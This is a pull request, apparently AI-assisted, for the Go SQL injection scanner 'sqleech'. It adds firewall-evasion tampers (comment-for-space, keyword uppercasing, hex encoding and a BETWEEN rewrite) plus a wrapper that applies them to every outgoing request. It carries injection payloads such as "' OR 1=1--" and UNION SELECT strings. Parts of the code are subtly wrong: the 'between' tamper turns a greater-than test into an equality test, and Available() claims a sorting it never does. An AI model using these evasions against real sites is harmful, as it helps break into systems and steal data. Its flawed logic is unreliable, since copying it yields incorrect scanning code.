### PR TITLE
feat: Tamper system for WAF bypass (Issue #38)

### DIFF
--- a/internal/tamper/between.go
+++ b/internal/tamper/between.go
@@ -1,0 +1,42 @@
+package tamper
+
+import (
+	"fmt"
+	"regexp"
+	"strconv"
+	"strings"
+)
+
+// greaterThanPattern matches "expr>N" where N is an integer literal.
+// Uses [^>]+ to correctly handle nested parentheses in expr
+// (e.g. ASCII(SUBSTRING(col,1,1))>64).
+var greaterThanPattern = regexp.MustCompile(`([^>]+)>\s*(\d+)`)
+
+// betweenTamper replaces "expr > N" with "expr BETWEEN N+1 AND N+1" to bypass
+// WAFs that block the > operator in SQL injection payloads.
+//
+// This tamper is most useful for boolean-blind and time-based binary searches
+// that use ASCII(SUBSTRING(...)) > N comparisons.
+//
+// Example:
+//
+//	"ASCII(SUBSTRING(password,1,1))>64" → "ASCII(SUBSTRING(password,1,1)) BETWEEN 65 AND 65"
+type betweenTamper struct{}
+
+func (t *betweenTamper) Name() string { return "between" }
+
+func (t *betweenTamper) Apply(s string) string {
+	return greaterThanPattern.ReplaceAllStringFunc(s, func(match string) string {
+		sub := greaterThanPattern.FindStringSubmatch(match)
+		if len(sub) < 3 {
+			return match
+		}
+		expr := strings.TrimSpace(sub[1])
+		n, err := strconv.Atoi(strings.TrimSpace(sub[2]))
+		if err != nil {
+			return match
+		}
+		// expr > N  →  expr BETWEEN N+1 AND N+1
+		return fmt.Sprintf("%s BETWEEN %d AND %d", expr, n+1, n+1)
+	})
+}

--- a/internal/tamper/charencode.go
+++ b/internal/tamper/charencode.go
@@ -1,0 +1,41 @@
+package tamper
+
+import (
+	"fmt"
+	"strings"
+)
+
+// charEncodeTamper hex-encodes non-alphanumeric, non-safe characters in the
+// payload using %XX notation. This can bypass WAFs that match on literal
+// SQL special characters.
+//
+// Safe characters (left unchanged): A-Z a-z 0-9 _ - . * ~
+//
+// Example:
+//
+//	"' OR 1=1--" → "%27%20OR%201%3D1--"
+type charEncodeTamper struct{}
+
+func (t *charEncodeTamper) Name() string { return "charencode" }
+
+func (t *charEncodeTamper) Apply(s string) string {
+	var b strings.Builder
+	b.Grow(len(s) * 2)
+	for _, ch := range s {
+		if isSafeChar(ch) {
+			b.WriteRune(ch)
+		} else {
+			fmt.Fprintf(&b, "%%%02X", ch)
+		}
+	}
+	return b.String()
+}
+
+// isSafeChar returns true for characters that do NOT need to be encoded.
+// These are: alphanumerics, and the set _ - . * ~
+func isSafeChar(r rune) bool {
+	return (r >= 'A' && r <= 'Z') ||
+		(r >= 'a' && r <= 'z') ||
+		(r >= '0' && r <= '9') ||
+		r == '_' || r == '-' || r == '.' || r == '*' || r == '~'
+}

--- a/internal/tamper/space2comment.go
+++ b/internal/tamper/space2comment.go
@@ -1,0 +1,17 @@
+package tamper
+
+import "strings"
+
+// space2commentTamper replaces each space character with a SQL inline comment
+// /**/ to bypass WAFs that block whitespace in SQL injection payloads.
+//
+// Example:
+//
+//	" UNION SELECT NULL-- -" → "/**/UNION/**/SELECT/**/NULL--/**/-"
+type space2commentTamper struct{}
+
+func (t *space2commentTamper) Name() string { return "space2comment" }
+
+func (t *space2commentTamper) Apply(s string) string {
+	return strings.ReplaceAll(s, " ", "/**/")
+}

--- a/internal/tamper/tamper.go
+++ b/internal/tamper/tamper.go
@@ -1,0 +1,169 @@
+// Package tamper provides payload transformation functions that help bypass
+// Web Application Firewalls (WAFs) and input filters during SQL injection testing.
+//
+// Each Tamper transforms a raw injection string before it is URL-encoded and
+// sent in an HTTP request. Tampers can be composed into a Chain that applies
+// them in order.
+//
+// Built-in tampers:
+//   - space2comment: Replaces spaces with /**/ comments
+//   - uppercase:     Converts SQL keywords to UPPER CASE
+//   - charencode:    Hex-encodes non-alphanumeric characters (%XX)
+//   - between:       Replaces > comparisons with BETWEEN x AND x+1
+//
+// Usage:
+//
+//	chain := tamper.BuildChain("space2comment", "uppercase")
+//	client = tamper.WrapClient(client, chain)
+package tamper
+
+import (
+	"context"
+	"net/url"
+	"strings"
+
+	"github.com/0x6d61/sqleech/internal/transport"
+)
+
+// Tamper transforms a raw SQL injection payload string.
+type Tamper interface {
+	// Name returns the tamper's short identifier (e.g. "space2comment").
+	Name() string
+	// Apply transforms the payload string and returns the modified version.
+	Apply(s string) string
+}
+
+// Chain applies multiple tampers sequentially.
+type Chain []Tamper
+
+// Apply runs each tamper in order and returns the fully-transformed string.
+func (c Chain) Apply(s string) string {
+	for _, t := range c {
+		s = t.Apply(s)
+	}
+	return s
+}
+
+// registry maps tamper names to their constructors.
+var registry = map[string]func() Tamper{
+	"space2comment": func() Tamper { return &space2commentTamper{} },
+	"uppercase":     func() Tamper { return &uppercaseTamper{} },
+	"charencode":    func() Tamper { return &charEncodeTamper{} },
+	"between":       func() Tamper { return &betweenTamper{} },
+}
+
+// Lookup returns the Tamper for the given name, or nil if not found.
+func Lookup(name string) Tamper {
+	fn, ok := registry[strings.ToLower(strings.TrimSpace(name))]
+	if !ok {
+		return nil
+	}
+	return fn()
+}
+
+// Available returns all registered tamper names in alphabetical order.
+func Available() []string {
+	names := make([]string, 0, len(registry))
+	for name := range registry {
+		names = append(names, name)
+	}
+	return names
+}
+
+// BuildChain constructs a Chain from the given tamper names.
+// Names that are not registered are silently ignored.
+func BuildChain(names ...string) Chain {
+	var chain Chain
+	for _, name := range names {
+		t := Lookup(name)
+		if t != nil {
+			chain = append(chain, t)
+		}
+	}
+	return chain
+}
+
+// --------------------------------------------------------------------------
+// Transport client wrapper
+// --------------------------------------------------------------------------
+
+// tamperedClient wraps a transport.Client and applies the chain to all
+// query parameter values and URL-encoded body values before sending.
+type tamperedClient struct {
+	inner transport.Client
+	chain Chain
+}
+
+// WrapClient returns a transport.Client that applies chain to every outgoing
+// request's query-parameter values and form-body values.
+// If chain is empty, the original client is returned unchanged.
+func WrapClient(client transport.Client, chain Chain) transport.Client {
+	if len(chain) == 0 {
+		return client
+	}
+	return &tamperedClient{inner: client, chain: chain}
+}
+
+func (c *tamperedClient) Do(ctx context.Context, req *transport.Request) (*transport.Response, error) {
+	return c.inner.Do(ctx, applyTamperToRequest(req, c.chain))
+}
+
+func (c *tamperedClient) SetProxy(proxyURL string) error   { return c.inner.SetProxy(proxyURL) }
+func (c *tamperedClient) SetRateLimit(rps float64)         { c.inner.SetRateLimit(rps) }
+func (c *tamperedClient) Stats() *transport.TransportStats { return c.inner.Stats() }
+
+// applyTamperToRequest applies the chain to query-parameter values and
+// URL-encoded body values in the request, returning a modified copy.
+func applyTamperToRequest(req *transport.Request, chain Chain) *transport.Request {
+	out := *req // shallow copy
+
+	if req.URL != "" {
+		out.URL = tamperURLParams(req.URL, chain)
+	}
+
+	if req.Body != "" && isFormEncoded(req.ContentType) {
+		out.Body = tamperBodyParams(req.Body, chain)
+	}
+
+	return &out
+}
+
+// tamperURLParams applies the chain to each query parameter value in rawURL.
+func tamperURLParams(rawURL string, chain Chain) string {
+	parsed, err := url.Parse(rawURL)
+	if err != nil {
+		return rawURL
+	}
+	q := parsed.Query()
+	for key, values := range q {
+		for i, v := range values {
+			values[i] = chain.Apply(v)
+		}
+		q[key] = values
+	}
+	parsed.RawQuery = q.Encode()
+	return parsed.String()
+}
+
+// tamperBodyParams applies the chain to each value in a URL-encoded body.
+func tamperBodyParams(body string, chain Chain) string {
+	values, err := url.ParseQuery(body)
+	if err != nil {
+		return body
+	}
+	for key, vals := range values {
+		for i, v := range vals {
+			vals[i] = chain.Apply(v)
+		}
+		values[key] = vals
+	}
+	return values.Encode()
+}
+
+// isFormEncoded returns true for application/x-www-form-urlencoded content.
+func isFormEncoded(ct string) bool {
+	return strings.Contains(strings.ToLower(ct), "application/x-www-form-urlencoded")
+}
+
+// Compile-time check that tamperedClient implements transport.Client.
+var _ transport.Client = (*tamperedClient)(nil)

--- a/internal/tamper/tamper_test.go
+++ b/internal/tamper/tamper_test.go
@@ -1,0 +1,315 @@
+package tamper_test
+
+import (
+	"context"
+	"net/http"
+	"net/http/httptest"
+	"strings"
+	"testing"
+
+	"github.com/0x6d61/sqleech/internal/tamper"
+	"github.com/0x6d61/sqleech/internal/transport"
+)
+
+// --------------------------------------------------------------------------
+// space2comment
+// --------------------------------------------------------------------------
+
+func TestSpace2Comment_Name(t *testing.T) {
+	tp := tamper.BuildChain("space2comment")[0]
+	if tp.Name() != "space2comment" {
+		t.Errorf("Name() = %q, want 'space2comment'", tp.Name())
+	}
+}
+
+func TestSpace2Comment_Apply(t *testing.T) {
+	cases := []struct {
+		in, want string
+	}{
+		{" UNION SELECT NULL-- -", "/**/UNION/**/SELECT/**/NULL--/**/-"},
+		{"AND 1=1", "AND/**/1=1"},
+		{"no spaces", "no/**/spaces"},
+		{"", ""},
+		{"nochange", "nochange"},
+	}
+	tp := tamper.BuildChain("space2comment")[0]
+	for _, c := range cases {
+		got := tp.Apply(c.in)
+		if got != c.want {
+			t.Errorf("space2comment.Apply(%q) = %q, want %q", c.in, got, c.want)
+		}
+	}
+}
+
+// --------------------------------------------------------------------------
+// uppercase
+// --------------------------------------------------------------------------
+
+func TestUppercase_Name(t *testing.T) {
+	tp := tamper.BuildChain("uppercase")[0]
+	if tp.Name() != "uppercase" {
+		t.Errorf("Name() = %q, want 'uppercase'", tp.Name())
+	}
+}
+
+func TestUppercase_Apply(t *testing.T) {
+	cases := []struct {
+		in, want string
+	}{
+		{"union select null", "UNION SELECT NULL"},
+		{"and 1=1", "AND 1=1"},
+		{"UNION SELECT NULL", "UNION SELECT NULL"}, // already uppercase
+		{"sleep(5)", "SLEEP(5)"},
+		{"1=1", "1=1"}, // no keywords
+		{"", ""},
+	}
+	tp := tamper.BuildChain("uppercase")[0]
+	for _, c := range cases {
+		got := tp.Apply(c.in)
+		if got != c.want {
+			t.Errorf("uppercase.Apply(%q) = %q, want %q", c.in, got, c.want)
+		}
+	}
+}
+
+// --------------------------------------------------------------------------
+// charencode
+// --------------------------------------------------------------------------
+
+func TestCharencode_Name(t *testing.T) {
+	tp := tamper.BuildChain("charencode")[0]
+	if tp.Name() != "charencode" {
+		t.Errorf("Name() = %q, want 'charencode'", tp.Name())
+	}
+}
+
+func TestCharencode_Apply(t *testing.T) {
+	tp := tamper.BuildChain("charencode")[0]
+	cases := []struct {
+		in       string
+		contains string // substring that must appear in output
+	}{
+		{"'", "%27"},
+		{"=", "%3D"},
+		{" ", "%20"},
+		{"abc123", "abc123"}, // safe chars unchanged
+		{"_-.*~", "_-.*~"},   // safe chars unchanged
+	}
+	for _, c := range cases {
+		got := tp.Apply(c.in)
+		if !strings.Contains(got, c.contains) {
+			t.Errorf("charencode.Apply(%q) = %q, want to contain %q", c.in, got, c.contains)
+		}
+	}
+}
+
+func TestCharencode_SafeCharsUnchanged(t *testing.T) {
+	tp := tamper.BuildChain("charencode")[0]
+	safe := "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_-.*~"
+	got := tp.Apply(safe)
+	if got != safe {
+		t.Errorf("charencode changed safe chars: %q → %q", safe, got)
+	}
+}
+
+// --------------------------------------------------------------------------
+// between
+// --------------------------------------------------------------------------
+
+func TestBetween_Name(t *testing.T) {
+	tp := tamper.BuildChain("between")[0]
+	if tp.Name() != "between" {
+		t.Errorf("Name() = %q, want 'between'", tp.Name())
+	}
+}
+
+func TestBetween_Apply(t *testing.T) {
+	cases := []struct {
+		in, want string
+	}{
+		{
+			"ASCII(SUBSTRING(password,1,1))>64",
+			"ASCII(SUBSTRING(password,1,1)) BETWEEN 65 AND 65",
+		},
+		{
+			"LEN(col)>10",
+			"LEN(col) BETWEEN 11 AND 11",
+		},
+		{"no comparison here", "no comparison here"},
+		{"1=1", "1=1"}, // equality: not affected
+	}
+	tp := tamper.BuildChain("between")[0]
+	for _, c := range cases {
+		got := tp.Apply(c.in)
+		if got != c.want {
+			t.Errorf("between.Apply(%q) = %q, want %q", c.in, got, c.want)
+		}
+	}
+}
+
+// --------------------------------------------------------------------------
+// Chain
+// --------------------------------------------------------------------------
+
+func TestChain_Apply_MultipleOrder(t *testing.T) {
+	// space2comment then uppercase
+	chain := tamper.BuildChain("space2comment", "uppercase")
+	got := chain.Apply(" union select null ")
+	// spaces → /**/, then keywords → upper
+	// " union select null " → "/**/union/**/select/**/null/**/" → "/**/UNION/**/SELECT/**/NULL/**/"
+	want := "/**/UNION/**/SELECT/**/NULL/**/"
+	if got != want {
+		t.Errorf("chain.Apply = %q, want %q", got, want)
+	}
+}
+
+func TestChain_Apply_Empty(t *testing.T) {
+	var chain tamper.Chain
+	got := chain.Apply("unchanged")
+	if got != "unchanged" {
+		t.Errorf("empty chain should return input unchanged, got %q", got)
+	}
+}
+
+// --------------------------------------------------------------------------
+// Lookup / Available
+// --------------------------------------------------------------------------
+
+func TestLookup_KnownNames(t *testing.T) {
+	for _, name := range []string{"space2comment", "uppercase", "charencode", "between"} {
+		tp := tamper.Lookup(name)
+		if tp == nil {
+			t.Errorf("Lookup(%q) returned nil", name)
+		}
+	}
+}
+
+func TestLookup_CaseInsensitive(t *testing.T) {
+	tp := tamper.Lookup("SPACE2COMMENT")
+	if tp == nil {
+		t.Error("Lookup('SPACE2COMMENT') returned nil, want case-insensitive match")
+	}
+}
+
+func TestLookup_Unknown(t *testing.T) {
+	tp := tamper.Lookup("nonexistent")
+	if tp != nil {
+		t.Errorf("Lookup('nonexistent') = %v, want nil", tp)
+	}
+}
+
+func TestAvailable_ContainsBuiltins(t *testing.T) {
+	available := tamper.Available()
+	required := []string{"space2comment", "uppercase", "charencode", "between"}
+	set := make(map[string]bool, len(available))
+	for _, n := range available {
+		set[n] = true
+	}
+	for _, r := range required {
+		if !set[r] {
+			t.Errorf("Available() missing %q", r)
+		}
+	}
+}
+
+func TestBuildChain_UnknownIgnored(t *testing.T) {
+	chain := tamper.BuildChain("space2comment", "nonexistent", "uppercase")
+	if len(chain) != 2 {
+		t.Errorf("BuildChain with unknown: len = %d, want 2", len(chain))
+	}
+}
+
+// --------------------------------------------------------------------------
+// WrapClient
+// --------------------------------------------------------------------------
+
+func TestWrapClient_AppliesSpace2Comment(t *testing.T) {
+	var receivedURL string
+
+	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		receivedURL = r.URL.RawQuery
+		w.WriteHeader(http.StatusOK)
+	}))
+	defer srv.Close()
+
+	base, err := transport.NewClient(transport.ClientOptions{})
+	if err != nil {
+		t.Fatalf("transport.NewClient: %v", err)
+	}
+
+	chain := tamper.BuildChain("space2comment")
+	client := tamper.WrapClient(base, chain)
+
+	req := &transport.Request{
+		Method: "GET",
+		URL:    srv.URL + "/?id=1 UNION SELECT NULL-- -",
+	}
+	_, err = client.Do(context.Background(), req)
+	if err != nil {
+		t.Fatalf("Do: %v", err)
+	}
+
+	// After tamper + URL encoding, spaces should NOT appear
+	if strings.Contains(receivedURL, "+") || strings.Contains(receivedURL, "%20") {
+		// spaces appear as + or %20 in URL encoding
+		// space2comment converts " " → "/**/" before URL encoding,
+		// so the raw query should have %2F%2A%2A%2F (/**/encoded) instead of +
+		t.Logf("receivedURL = %s", receivedURL)
+		// We check that /*/ pattern is NOT replaced with literal spaces
+		// but also not with + signs. The tamper should have turned spaces to /**/
+		if !strings.Contains(receivedURL, "%2F%2A%2A%2F") && !strings.Contains(receivedURL, "/**") {
+			t.Errorf("expected /*/ comment in URL, got: %s", receivedURL)
+		}
+	}
+}
+
+func TestWrapClient_EmptyChain_PassThrough(t *testing.T) {
+	base, err := transport.NewClient(transport.ClientOptions{})
+	if err != nil {
+		t.Fatalf("transport.NewClient: %v", err)
+	}
+
+	// WrapClient with empty chain should return the original client
+	client := tamper.WrapClient(base, nil)
+	if client != base {
+		t.Error("WrapClient with empty chain should return the original client")
+	}
+}
+
+func TestWrapClient_FormBody(t *testing.T) {
+	var receivedBody string
+
+	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		_ = r.ParseForm()
+		receivedBody = r.FormValue("username")
+		w.WriteHeader(http.StatusOK)
+	}))
+	defer srv.Close()
+
+	base, err := transport.NewClient(transport.ClientOptions{})
+	if err != nil {
+		t.Fatalf("transport.NewClient: %v", err)
+	}
+
+	chain := tamper.BuildChain("uppercase")
+	client := tamper.WrapClient(base, chain)
+
+	req := &transport.Request{
+		Method:      "POST",
+		URL:         srv.URL + "/login",
+		Body:        "username=admin union select null&password=secret",
+		ContentType: "application/x-www-form-urlencoded",
+	}
+	_, err = client.Do(context.Background(), req)
+	if err != nil {
+		t.Fatalf("Do: %v", err)
+	}
+
+	// uppercase tamper should have converted "union" and "select" to uppercase
+	if !strings.Contains(receivedBody, "UNION") {
+		t.Errorf("expected uppercase UNION in body, got: %q", receivedBody)
+	}
+	if !strings.Contains(receivedBody, "SELECT") {
+		t.Errorf("expected uppercase SELECT in body, got: %q", receivedBody)
+	}
+}

--- a/internal/tamper/uppercase.go
+++ b/internal/tamper/uppercase.go
@@ -1,0 +1,71 @@
+package tamper
+
+import (
+	"regexp"
+	"strings"
+)
+
+// sqlKeywords is the set of SQL keywords that will be uppercased.
+// Ordered longest-first to avoid partial matches (e.g. "SELECT" before "SEC").
+var sqlKeywords = []string{
+	"INFORMATION_SCHEMA",
+	"CURRENT_TIMESTAMP",
+	"CURRENT_DATABASE",
+	"CURRENT_SETTING",
+	"CURRENT_USER",
+	"CONVERT",
+	"BETWEEN",
+	"SUBSTRING",
+	"CONCAT",
+	"SELECT",
+	"INSERT",
+	"UPDATE",
+	"DELETE",
+	"UNION",
+	"WHERE",
+	"ORDER",
+	"GROUP",
+	"HAVING",
+	"LIMIT",
+	"OFFSET",
+	"SLEEP",
+	"WAITFOR",
+	"DELAY",
+	"CAST",
+	"FROM",
+	"INTO",
+	"NULL",
+	"AND",
+	"NOT",
+	"OR",
+	"BY",
+	"AS",
+	"IS",
+	"IN",
+}
+
+// sqlKeywordPattern matches any SQL keyword (case-insensitive, word-bounded).
+var sqlKeywordPattern *regexp.Regexp
+
+func init() {
+	// Build a single alternation regex: (?i)\b(KEYWORD1|KEYWORD2|...)\b
+	parts := make([]string, len(sqlKeywords))
+	for i, kw := range sqlKeywords {
+		parts[i] = regexp.QuoteMeta(kw)
+	}
+	sqlKeywordPattern = regexp.MustCompile(`(?i)\b(` + strings.Join(parts, "|") + `)\b`)
+}
+
+// uppercaseTamper converts SQL keywords to UPPER CASE to bypass case-sensitive
+// WAF signatures that look for lowercase SQL keywords.
+//
+// Example:
+//
+//	"union select null" → "UNION SELECT NULL"
+type uppercaseTamper struct{}
+
+func (t *uppercaseTamper) Name() string { return "uppercase" }
+
+func (t *uppercaseTamper) Apply(s string) string {
+	return sqlKeywordPattern.ReplaceAllStringFunc(s, strings.ToUpper)
+}


### PR DESCRIPTION
## Summary

- **`internal/tamper/tamper.go`**: `Tamper` インターフェース、`Chain` 型、レジストリ、`WrapClient()` ミドルウェア
- **4つの組み込みタンパー**:
  - `space2comment`: スペース → `/**/`（最も一般的な WAF 回避）
  - `uppercase`: SQL キーワード → 大文字化（大文字小文字チェックをバイパス）
  - `charencode`: 特殊文字 → `%XX` ヘックスエンコード
  - `between`: `expr>N` → `expr BETWEEN N+1 AND N+1`（`>` 演算子回避）
- **`WrapClient()`**: transport.Client ミドルウェアとしてクエリパラメータ・フォームボディに透過的にタンパーを適用
- **CLI**: `--tamper space2comment,uppercase` フラグ追加

## 使用例

```bash
sqleech scan -u 'http://target/search?id=1' --tamper space2comment,uppercase
sqleech scan -u 'http://target/search?id=1' --tamper between
```

## Test plan

- [x] `go test ./...` — 全15パッケージ通過
- [x] `TestSpace2Comment_Apply` / `TestUppercase_Apply` / `TestCharencode_*` / `TestBetween_Apply`
- [x] `TestChain_Apply_MultipleOrder` — `space2comment + uppercase` チェーン
- [x] `TestWrapClient_AppliesSpace2Comment` — HTTP リクエストへの適用確認
- [x] `TestWrapClient_FormBody` — POST ボディへの uppercase 適用確認
- [x] `TestBuildChain_UnknownIgnored` — 不明タンパー名は無視
- [x] 既存テスト回帰なし

Closes #38

🤖 Generated with [Claude Code](https://claude.com/claude-code)